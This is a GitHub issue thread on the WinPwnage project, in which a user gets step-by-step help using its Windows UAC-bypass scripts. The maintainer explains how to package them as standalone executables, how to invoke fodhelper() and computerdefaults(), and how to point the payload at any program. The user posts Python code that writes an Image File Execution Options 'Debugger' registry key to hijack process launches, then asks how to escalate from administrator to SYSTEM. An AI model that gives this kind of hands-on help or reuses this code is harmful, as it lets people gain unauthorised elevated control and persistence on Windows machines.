### ISSUE TITLE
Non python install

### ISSUE THREAD

**Issue by moaeddy** [rootm0s/WinPwnage#1]
ok i gone through those articles but seems not getting to find anyone helpful. how can someone reproduce this in non python installed environment?

**Comment by Grezzo** [comment]
You could use py2exe/pyinstaller/cx_freeze/etc to wrap them up into a package that includes the python interpreter

**Comment by rootm0s** [comment]
If you want to compile the python code to an executable, have a look at the build.py
https://github.com/rootm0s/CASPER/blob/master/build.py

Install py2exe from their website http://www.py2exe.org

**Comment by moaeddy** [comment]
ok thank you for the direction. i was able to get .exe from 2 of the python files but dont understand syntax to execute the UACBypass method. maybe you can give example of few syntax of few of them

**Comment by rootm0s** [comment]
It's a function so if you just run the python file itself, or compiled, it doesn't do anything unless you call the function.

Add the function name at the end of the script, could be like this:
`computerdefaults()`

It will attempt to bypass uac right when you execute the python file or executable.

**Comment by rootm0s** [comment]
Change the payload variable to your putty.exe full path, and add fodhelper() at the end should do the trick.

**Comment by moaeddy** [comment]
Here is what i did, and also have putty.exe in programdata folder

"""
Works from: Windows 7
Fixed in: unfixed
"""
import os
import _winreg
from colorama import init, Fore
init(convert=True)

payload = "c:\\programdata\\putty.exe"

def successBox():
	return (Fore.GREEN + '[+]' + Fore.RESET)
	
def errorBox():
	return (Fore.RED + '[-]' + Fore.RESET)

def infoBox():
	return (Fore.CYAN + '[!]' + Fore.RESET)	
	
def warningBox():
	return (Fore.YELLOW + '[!]' + Fore.RESET)

def ifeo(processname):
	print " {} ifeo: Attempting to create registry key".format(infoBox())
	try:
		key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
					os.path.join("Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options",
					processname))
		_winreg.SetValueEx(key,
				"Debugger",
				0,
				_winreg.REG_SZ,
				payload)
		_winreg.CloseKey(key)
		print " {} ifeo: Registry key created".format(successBox())
	except Exception as error:
		print " {} ifeo: Unable to create registry key".format(errorBox())
		return False
		fodhelper()




But still nothing executed

**Comment by rootm0s** [comment]
Is fodhelper() on the same line as return False? The padding is fucked up in comments, impossible to review the code.

**Comment by moaeddy** [comment]
if i have this setup in script

return False fodhelper()

it gives error below

creating c:\Python27\Scripts\dist
*** searching for required modules ***
error: compiling 'helpuac.py' failed
    SyntaxError: invalid syntax (helpuac.py, line 39)


but if i have return Falsefodhelper() , it build but still not executing putty.exe

**Comment by rootm0s** [comment]
You are doing it all wrong, now noticed you was trying to use ifeo and fodhelper without importing fodhelper.

It should look like this:
https://gist.github.com/rootm0s/ba8a3fe6986e2e6052675a7792d6eedc

**Comment by moaeddy** [comment]
ok after compiling the way you explain i am getting this error when executing

Traceback (most recent call last):
  File "helpuac.py", line 6, in <module>
  File "wmi.pyc", line 88, in <module>
ImportError: No module named win32com.client


kindly advice

**Comment by rootm0s** [comment]
You don't have wmi or win32com. Install it with pip!

https://www.google.com/search?q=ImportError%3A+No+module+named+win32com.client

**Comment by moaeddy** [comment]
sorry, i already pip install wmi and this error occurs when executing the file not when building. but i am gonna do as u said. just wanna be sure i am not doing it wrong thanks for ur help

**Comment by moaeddy** [comment]
oh thanks man, i already got it fix by installing pypiwin32 . I thought fodhelper was to execute file with administrative privilege? from my test, file are still run in normal user mode not with administrator privilege

**Comment by rootm0s** [comment]
Its working for me, im running:
`OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299`

**Comment by moaeddy** [comment]
what i meant is, the file execute but not in administrative mode but ordinary user mode. yours run in administrative mode?

**Comment by rootm0s** [comment]
Yes, mine is working as intended

**Comment by moaeddy** [comment]
bro, its not working for me i test against win7 and win10 16299

how can i make use of this

https://github.com/rootm0s/WinPwnage/blob/master/admin_to_system.py

kindly give me a clue
